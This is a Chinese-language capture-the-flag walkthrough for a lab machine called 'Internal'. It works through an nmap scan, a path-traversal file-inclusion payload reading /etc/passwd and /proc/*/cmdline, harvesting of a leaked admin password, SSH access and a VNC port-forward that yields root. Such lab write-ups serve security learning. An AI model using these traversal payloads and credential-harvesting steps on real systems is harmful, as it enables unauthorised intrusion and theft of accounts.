# 靶场搭建
下载:Internal
Nat,IP: 192.168.1.166
# 渗透过程
# 信息初收集
┌──(root㉿kali)-[~] | |
└─# nmap -p- -A 192.168.1.166 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 09:27 EDT | |
Nmap scan report for 192.168.1.166 | |
Host is up (0.00054s latency). | |
Not shown: 65532 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-server-header: Apache/2.4.56 (Debian) | |
|_http-title: Day Bootstrap Template - Index | |
9999/tcp open abyss? |
80 端口检查源代码,发现可以文件包含,FUZZ 一下可以包含: http://192.168.1.166/internal-item.php?item=....//....//....//etc/passwd
用户 root 和 admin
包含进程文件: http://192.168.1.166/internal-item.php?item=....//....//....//proc/self/cmdline
/proc/self 是一个指向当前进程自身的符号链接,因此 /proc/self/cmdline 实际上是指向当前进程的命令行参数的文件。当打开 /proc/self/cmdline 文件时,将看到一个包含了当前进程命令行参数的字符串,参数之间以空格分隔,通常以 null 字符(ASCII 值为 0)结尾。这个文件内容可以用于查看当前进程的启动参数,例如,一个运行中的程序的命令行参数。
枚举一下:
GET /internal-item.php?item=....//....//....//proc/§1§/cmdline HTTP/1.1 | |
Host: 192.168.1.166 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Connection: keep-alive | |
Upgrade-Insecure-Requests: 1 |
数字 1-10000,获取到一些信息,找到关键信息:
HTTP/1.1 200 OK | |
Date: Wed, 29 May 2024 15:09:37 GMT | |
Server: Apache/2.4.56 (Debian) | |
Vary: Accept-Encoding | |
Content-Length: 100 | |
Keep-Alive: timeout=5, max=70 | |
Connection: Keep-Alive | |
Content-Type: text/html; charset=UTF-8 | |
<pre> | |
python3/home/admin/python3HTTPSAuthServer.py--port9999--authadmin:4dM1Nt3rN4LP4zZ | |
</pre> |
拿到账号密码了: admin/4dM1Nt3rN4LP4zZ ,直接去 9999 端口登录
进去的页面很眼熟 ==、
ssh 试一下登陆了,那就不看 9999 了
# 提权
用户目录下 ... 文件夹中有个 zip,解压要密码,同上: 4dM1Nt3rN4LP4zZ
解压出来个 passwd
ps -ef 发现启动了个 vnc: /usr/bin/Xtigervnc :1 -rfbport 5901 -localhost=1 -SecurityTypes VncAuth -PasswordFile /root/.vnc/passwd -ClientWaitTimeMillis 30000 -geometry 1920x1200 -deskto
用到的就是这个 passwd,那就直接往上连吧
通过 ssh 建立一条隧道: ssh -N -L 5901:127.0.0.1:5901 [email protected] ,将 5901 映射到本地
然后直接连上去拿到 root: vncviewer 127.0.0.1::5901 -passwd passwd
